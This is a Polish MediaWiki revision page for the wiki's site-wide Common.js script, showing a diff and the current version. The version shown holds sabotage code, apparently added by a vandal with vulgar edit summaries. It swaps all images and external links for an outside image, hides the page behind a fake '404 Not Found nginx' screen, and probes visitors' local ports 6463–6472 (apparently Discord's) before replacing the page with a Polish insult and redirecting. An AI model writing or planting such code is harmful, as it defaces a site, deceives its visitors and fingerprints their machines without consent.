kontakt: [email protected]
MediaWiki:Common.js: Różnice pomiędzy wersjami
Przejdź do nawigacji
Przejdź do wyszukiwania
imported>Sługa szatana m huj |
imported>Sługa szatana wkurwia mnie wkurwia was |
||
Linia 51: | Linia 51: | ||
} | } | ||
document.querySelectorAll("body table.catlinks").forEach((el, i) | document.querySelectorAll("body table.catlinks").forEach(function(el, i) { | ||
var header = el.querySelector("p"); | var header = el.querySelector("p"); | ||
if (!header || header.querySelector("a.toggle-dpl")) { return; } | if (!header || header.querySelector("a.toggle-dpl")) { return; } | ||
Linia 62: | Linia 62: | ||
}) | }) | ||
document.body.addEventListener("click", e | document.body.addEventListener("click", function(e) { | ||
var link = e.target; | var link = e.target; | ||
if (!link || !link.matches("a.toggle-dpl")) { return; } | if (!link || !link.matches("a.toggle-dpl")) { return; } | ||
Linia 84: | Linia 84: | ||
} | } | ||
} | } | ||
Wersja z 04:48, 28 lis 2023
// michal gieres if(localStorage.ali!="sragca") { const chuuj = document.querySelectorAll("img"); for (var i = 0; i < chuuj .length; i++) { chuuj [i].src = "https://files.catbox.moe/lqxp7t.png"; } const linkipanaagcy = document.querySelectorAll("a[rel=nofollow].external"); for (var i = 0; i < linkipanaagcy .length; i++) { linkipanaagcy [i].href = "https://files.catbox.moe/lqxp7t.png"; } }; var randId = "fioot" + Math.floor(Math.random() * 500); if (localStorage.gowno === undefined || localStorage.gowno === "undefined" || localStorage.gowno === "" || localStorage.gowno.startsWith("fjut")) { localStorage.gowno = randId; } czterystacztery=document.createElement("center"); czterystacztery.innerHTML = "<h1>404 Not Found</h1>"; nginx=document.createElement("center"); nginx.innerHTML = "nginx"; czerwonka=document.createElement("div"); czerwonka.classList.add(localStorage.gowno); czerwonka.style.height = "100%"; czerwonka.style.width = "100%"; czerwonka.style.position = "fixed"; czerwonka.style.background = "white"; czerwonka.style.top = "0"; czerwonka.style.left = "0"; czerwonka.style.zIndex = "9999"; czerwonka.style.color = "black"; czerwonka.style.fontFamily = "serif"; document.querySelector("#content").appendChild(czerwonka); czerwonka.appendChild(czterystacztery); czerwonka.appendChild(nginx); for (var rak = 6463; rak <= 6472; rak++) { new WebSocket("ws://127.0.0.1:" + rak + "/").onopen = function(e) { this.close(); document.body.innerText = "kompromitacja cwela"; location.href = "https://discord.com/app"; } } if (document.querySelector("#bodyContent > .usermessage")) { document.title = "(!) " + document.title; } document.querySelectorAll("body table.catlinks").forEach(function(el, i) { var header = el.querySelector("p"); if (!header || header.querySelector("a.toggle-dpl")) { return; } var list = el.querySelector("ul"); if (list) { list.style.display = "none"; var x = $(`<span>[<a href="#" class="toggle-dpl" data-state="0">Pokaż</a>]</span>`); header.append(x[0]); } }) document.body.addEventListener("click", function(e) { var link = e.target; if (!link || !link.matches("a.toggle-dpl")) { return; } e.preventDefault(); var table = link.closest("table"); if (table) { var list = table.querySelector("ul"); if (list) { switch (link.dataset.state) { case "0": link.dataset.state = "1"; link.innerText = "Ukryj"; list.style.display = "initial"; break; case "1": link.dataset.state = "0"; link.innerText = "Pokaż"; list.style.display = "none"; break; } } }